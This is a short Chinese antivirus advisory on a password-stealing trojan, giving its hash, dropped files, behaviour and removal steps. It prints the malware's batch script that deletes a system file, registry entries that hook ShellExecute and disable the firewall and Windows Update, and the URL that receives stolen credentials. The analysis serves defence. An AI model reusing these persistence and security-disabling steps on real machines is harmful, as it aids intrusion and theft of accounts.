【IT168 专稿】
病毒名称: 特洛伊盗号木马
病毒类型:盗号木马
文件MD5: 56E146754050E7D5FFA49715DC2C2670
公开范围:完全公开
危害等级: 4
文件长度:16,142 字节
脱壳后: 282,972 字节
感染系统: Windows98以上版本
加壳类型:Upack 0.3.9 beta2s -> Dwing [Overlay]
病毒描述
首先删除微软的系统文件verclsid.exe,然后在fonts目录下释放病毒文件。rsjzbsp.exe文件为病毒主体,rsjzbpm.dll为进程注入, 保护rsjzbsp.exe文件以免被直接删除。Gejibnd.fon为加密的url地址,rsjzbfg.dll文件为明文的url地址。
行为分析-本地行为
1、在c盘下创建DFD490781.bat批处理文件,其作用为实现删除verclsid.exe。内容如下:
@echo off
:Loop
attrib "C:\WINDOWS\system32\verclsid.exe" -r -a -s -h
del "C:\WINDOWS\system32\verclsid.exe"
if exist "C:\WINDOWS\system32\verclsid.exe" goto Loop
del %0
2、在c:\windows\fonts下面释放gejibnd.fon、rsjzbfg.dll、rsjzbpm.dll和rsjzbsp.exe文件。
3、取得帐户和密码后将发到下面的地址:http://www.ads183.com/buguale/wx/post.asp
4、修改下列注册表:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}\InprocServer32]
@="C:\\WINDOWS\\Fonts\\rsjzbpm.dll"
"ThreadingModel"="Apartment"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}"="rsjzbpm.dll" \\执行挂钩
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate"=dword:00000001 \\关闭自动更新
"AUOptions"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000 \\关闭防火墙
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000
清除方案
1、结束rsjzbsp.exe进程
2、删除注册表项
HKEY_CLASSES_ROOT\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}
HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELLEXECUTEHOOKS\{22FAACDE-34DA-CCD4-AB4D-DA34485A3422}
3、重命名并重启计算机删除fonts下面的gejibnd.fon、rsjzbfg.dll、rsjzbpm.dll和rsjzbsp.exe文件。
4、修改被篡改的注册表项,开启防火墙和自动更新